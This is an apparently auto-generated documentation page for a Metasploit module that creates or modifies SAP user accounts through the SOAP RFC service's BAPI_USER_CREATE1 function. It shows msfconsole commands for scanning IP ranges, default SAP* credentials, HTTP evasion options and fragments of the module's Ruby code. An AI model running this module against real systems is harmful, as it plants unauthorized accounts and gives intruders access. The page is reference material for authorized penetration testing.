SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/sap/sap_soap_bapi_user_create1 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation
Module: auxiliary/scanner/sap/sap_soap_bapi_user_create1
Source code: modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module makes use of the BAPI_USER_CREATE1 function, through the SOAP /sap/bc/soap/rfc service, for creating/modifying users on a SAP.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/sap/sap_soap_bapi_user_create1
msf auxiliary(sap_soap_bapi_user_create1) > show options
    ... show and set options ...
msf auxiliary(sap_soap_bapi_user_create1) > set RHOSTS ip-range
msf auxiliary(sap_soap_bapi_user_create1) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(sap_soap_bapi_user_create1) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(sap_soap_bapi_user_create1) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(sap_soap_bapi_user_create1) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/sap/sap_soap_bapi_user_create1 auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/sap/sap_soap_bapi_user_create1

msf6 auxiliary(scanner/sap/sap_soap_bapi_user_create1) > show info

       Name: SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation
     Module: auxiliary/scanner/sap/sap_soap_bapi_user_create1
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Agnivesh Sathasivam
  nmonkee

Check supported:
  No

Basic options:
  Name           Current Setting  Required  Description
  ----           ---------------  --------  -----------
  BAPI_FIRST     John             yes       First name
  BAPI_LAST      Doe              yes       Last name
  BAPI_PASSWORD  msf1234          yes       Password for the account (Default is msf1234)
  BAPI_USER      MSF              yes       Username for the account (Username in upper case only. Default is MSF)
  CLIENT         001              yes       SAP client
  HttpPassword   06071992         yes       Password
  HttpUsername   SAP*             yes       Username
  Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT          8000             yes       The target port (TCP)
  SSL            false            no        Negotiate SSL/TLS for outgoing connections
  THREADS        1                yes       The number of concurrent threads (max one per host)
  VHOST                           no        HTTP server virtual host

Description:
  This module makes use of the BAPI_USER_CREATE1 function, through the 
  SOAP /sap/bc/soap/rfc service, for creating/modifying users on a 
  SAP.

References:
  http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/

Module Options


This is a complete list of options available in the scanner/sap/sap_soap_bapi_user_create1 auxiliary module:

msf6 auxiliary(scanner/sap/sap_soap_bapi_user_create1) > show options

Module options (auxiliary/scanner/sap/sap_soap_bapi_user_create1):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   BAPI_FIRST     John             yes       First name
   BAPI_LAST      Doe              yes       Last name
   BAPI_PASSWORD  msf1234          yes       Password for the account (Default is msf1234)
   BAPI_USER      MSF              yes       Username for the account (Username in upper case only. Default is MSF)
   CLIENT         001              yes       SAP client
   HttpPassword   06071992         yes       Password
   HttpUsername   SAP*             yes       Username
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          8000             yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   THREADS        1                yes       The number of concurrent threads (max one per host)
   VHOST                           no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/sap/sap_soap_bapi_user_create1 auxiliary module:

msf6 auxiliary(scanner/sap/sap_soap_bapi_user_create1) > show advanced

Module advanced options (auxiliary/scanner/sap/sap_soap_bapi_user_create1):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/sap/sap_soap_bapi_user_create1 module can do:

msf6 auxiliary(scanner/sap/sap_soap_bapi_user_create1) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/sap/sap_soap_bapi_user_create1 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/sap/sap_soap_bapi_user_create1) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

[SAP] <IP>:<RPORT> - Logon failed


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - Logon failed" error message:

110:	          'sap-language'  => 'EN'
111:	        }
112:	      })
113:	      if res and res.code == 200
114:	        if res.body =~ /<h1>Logon failed<\/h1>/
115:	          print_error("[SAP] #{ip}:#{rport} - Logon failed")
116:	          return
117:	        elsif res.body =~ /faultstring/
118:	          error = []
119:	          error.push(res.body.scan(%r{<faultstring>(.*?)</faultstring>}))
120:	          print_error("[SAP] #{ip}:#{rport} - #{error.join().chomp}")

[SAP] <IP>:<RPORT> - <VALUE>


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - <VALUE>" error message:

115:	          print_error("[SAP] #{ip}:#{rport} - Logon failed")
116:	          return
117:	        elsif res.body =~ /faultstring/
118:	          error = []
119:	          error.push(res.body.scan(%r{<faultstring>(.*?)</faultstring>}))
120:	          print_error("[SAP] #{ip}:#{rport} - #{error.join().chomp}")
121:	          return
122:	        else
123:	          print_good("[SAP] #{ip}:#{rport} - User '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}' created")
124:	          report_auth(
125:	            ip: ip,

[SAP] <IP>:<RPORT> - Unknown Error


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - Unknown Error" error message:

130:	            proof: res.body
131:	          )
132:	          return
133:	        end
134:	      else
135:	        print_error("[SAP] #{ip}:#{rport} - Unknown Error")
136:	        if res
137:	          print_error("[SAP] #{ip}:#{rport} - Error code: #{res.code}")
138:	          print_error("[SAP] #{ip}:#{rport} - Error message: #{res.message}")
139:	        end
140:	        return

[SAP] <IP>:<RPORT> - Error code: <RES.CODE>


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - Error code: <RES.CODE>" error message:

132:	          return
133:	        end
134:	      else
135:	        print_error("[SAP] #{ip}:#{rport} - Unknown Error")
136:	        if res
137:	          print_error("[SAP] #{ip}:#{rport} - Error code: #{res.code}")
138:	          print_error("[SAP] #{ip}:#{rport} - Error message: #{res.message}")
139:	        end
140:	        return
141:	      end
142:	    rescue ::Rex::ConnectionError

[SAP] <IP>:<RPORT> - Error message: <RES.MESSAGE>


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - Error message: <RES.MESSAGE>" error message:

133:	        end
134:	      else
135:	        print_error("[SAP] #{ip}:#{rport} - Unknown Error")
136:	        if res
137:	          print_error("[SAP] #{ip}:#{rport} - Error code: #{res.code}")
138:	          print_error("[SAP] #{ip}:#{rport} - Error message: #{res.message}")
139:	        end
140:	        return
141:	      end
142:	    rescue ::Rex::ConnectionError
143:	      print_error("[SAP] #{ip}:#{rport} - Unable to connect")

[SAP] <IP>:<RPORT> - Unable to connect


Here is a relevant code snippet related to the "[SAP] <IP>:<RPORT> - Unable to connect" error message:

137:	          print_error("[SAP] #{ip}:#{rport} - Error code: #{res.code}")
138:	          print_error("[SAP] #{ip}:#{rport} - Error message: #{res.message}")
139:	        end
140:	        return
141:	      end
142:	    rescue ::Rex::ConnectionError
143:	      print_error("[SAP] #{ip}:#{rport} - Unable to connect")
144:	      return
145:	    end
146:	  end
147:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Agnivesh Sathasivam
  • nmonkee

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.